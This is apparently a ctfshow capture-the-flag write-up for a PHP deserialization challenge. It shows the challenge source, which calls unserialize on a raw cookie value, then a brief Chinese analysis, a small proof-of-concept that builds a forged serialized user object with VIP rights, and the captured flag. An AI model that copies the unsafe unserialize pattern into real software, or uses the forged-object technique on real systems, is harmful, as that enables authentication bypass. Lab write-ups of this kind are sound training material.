nginx/1.16.1PHP/7.3.11

    1. <?php
    3. /*
    4. # -*- coding: utf-8 -*-
    5. # @Author: h1xa
    6. # @Date:   2020-12-02 17:44:47
    7. # @Last Modified by:   h1xa
    8. # @Last Modified time: 2020-12-02 19:29:02
    9. # @email: h1xa@ctfer.com
    10. # @link: https://ctfer.com
    12. */
    14. error_reporting(0);
    15. highlight_file(__FILE__);
    16. include('flag.php');
    18. class ctfShowUser{
    19.     public $username='xxxxxx';
    20.     public $password='xxxxxx';
    21.     public $isVip=false;
    23.     public function checkVip(){
    24.         return $this->isVip;
    25.     }
    26.     public function login($u,$p){
    27.         return $this->username===$u&&$this->password===$p;
    28.     }
    29.     public function vipOneKeyGetFlag(){
    30.         if($this->isVip){
    31.             global $flag;
    32.             if($this->username!==$this->password){
    33.                     echo "your flag is ".$flag;
    34.               }
    35.         }else{
    36.             echo "no vip, no flag";
    37.         }
    38.     }
    39. }
    41. $username=$_GET['username'];
    42. $password=$_GET['password'];
    44. if(isset($username) && isset($password)){
    45.     $user = unserialize($_COOKIE['user']);    
    46.     if($user->login($username,$password)){
    47.         if($user->checkVip()){
    48.             $user->vipOneKeyGetFlag();
    49.         }
    50.     }else{
    51.         echo "no vip,no flag";
    52.     }
    53. }

    分析:
    即要满足

    • 类成员 isVip 为 true
    • 传入的 username 和 类成员 username 相等
    • 传入的 password 和 类成员 password 相等
    • 类的 username 和 password 不等(原来是相等的)

    因为通过反序列化修改原有数据即可

    poc

    1. <?php
    2. $user = new ctfShowUser();
    3. $user->isVip = true;
    4. $user->username = '6';
    5. echo urlencode(serialize($user));
    6. ?>

    image.png

    flag
    ctfshow{b394e284-4c49-4a9f-bdae-6cf99f29011c}